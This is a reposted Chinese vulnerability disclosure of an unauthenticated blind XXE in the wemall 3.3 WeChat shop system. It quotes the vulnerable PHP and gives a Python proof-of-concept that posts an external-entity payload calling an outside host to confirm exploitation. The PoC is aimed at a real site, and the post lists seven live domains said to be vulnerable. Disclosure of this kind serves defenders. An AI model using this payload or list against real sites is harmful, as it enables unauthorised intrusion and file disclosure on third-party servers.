IT博客汇 | wemall微信开源PHP商城系统一处blind xxe（无需登录，附POC）

wemall微信开源PHP商城系统一处blind xxe（无需登录，附POC）

没穿底裤发表于 2015-10-09 13:54:59

漏洞作者： 1c3z

详细说明：

测试版本wemall 3.3

下载地址 http://git.oschina.net/einsqing/wemall/repository/archive?ref=master 需要开源中国的账号

//Application\Lib\Action\Admin\WechatAction.class.php

<?php

class WechatAction extends Action {

	public function init() {

		import ( 'wechat', APP_PATH . 'Common', '.class.php' );

		$config = M ( "Wxconfig" )->where ( array (

				"id" => "1" 

		) )->find ();

		

		$options = array (

				'token' => $config ["token"], // 填写你设定的key

				'encodingaeskey' => $config ["encodingaeskey"], // 填写加密用的EncodingAESKey

				'appid' => $config ["appid"], // 填写高级调用功能的app id

				'appsecret' => $config ["appsecret"], // 填写高级调用功能的密钥

				);

		$weObj = new Wechat ( $options );

		return $weObj;

	}

	public function index() {

		$weObj = $this->init ();

		$weObj->valid ();

可以看到index函数中

$weObj为Wechat类的实例化

而Wechat类从import ( ‘wechat’, APP_PATH . ‘Common’, ‘.class.php’ );导入的

也就是Application/Common/wechat.class.php

重点关注valid()函数

public function valid($return=false)

    {

        $encryptStr="";

        if ($_SERVER['REQUEST_METHOD'] == "POST") {

            $postStr = file_get_contents("php://input");

            $array = (array)simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);

直接使用了simplexml_load_string函数

如何调用代码呢？

访问index.php?g=Admin&m=Wechat&a=index

如何利用参考： http://wooyun.org/bugs/wooyun-2010-098591

下面是poc代码：

#!/usr/bin/python



import urllib2

import random



import socket

socket.setdefaulttimeout(10)

def send_xml(url,data):

    import requests

    try:

        requests.post(url,data)

    except Exception, e:

        print e



def poc(host):

    url = 'http://' + host + '/index.php?g=Admin&m=Wechat&a=index'

    key = "".join(random.sample('abcdefghijklmnopqrstuvwxyz', 6))

    value = "".join(random.sample('abcdefghijklmnopqrstuvwxyz', 6))

    data = """<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE root [

<!ENTITY % remote SYSTEM "http://pysandbox.sinaapp.com/kv?act=set&k={key}&v={value}">

%remote;]>

<root/>"""

    data = data.replace('{key}', key).replace('{value}', value)



    send_xml(url, data)



    url = 'http://pysandbox.sinaapp.com/kv?act=get&k=' + key

    res = urllib2.urlopen(url).read()



    if value in res:

        print "xxe"



poc('www.mybuy.so')

访问http://pysandbox.sinaapp.com/kv?act=set&k={key}&v={value} 可以在远程主机设置一个键值对

http://pysandbox.sinaapp.com/kv?act=get&k=刚刚的key 可以查看是否设置了这个键值对

商业版本也应该可以xxe

http://demo.inuoer.com/1/Admin/Wechat/index.html

但是demo有防火墙

漏洞证明：

下面是存在xxe的

http://www.dadodo.wang/index.php?g=Admin&m=Wechat&a=index

http://www.jxbar.com/index.php?g=Admin&m=Wechat&a=index

http://www.liushengjie.com/index.php?g=Admin&m=Wechat&a=index

http://www.wifi-xj.com/index.php?g=Admin&m=Wechat&a=index

http://www.tjguguai.net/index.php?g=Admin&m=Wechat&a=index

http://www.mallonline.com.cn/index.php?g=Admin&m=Wechat&a=index

http://www.mybuy.so/index.php?g=Admin&m=Wechat&a=index

修复方案：

http://wiki.wooyun.org/web:xxe-attack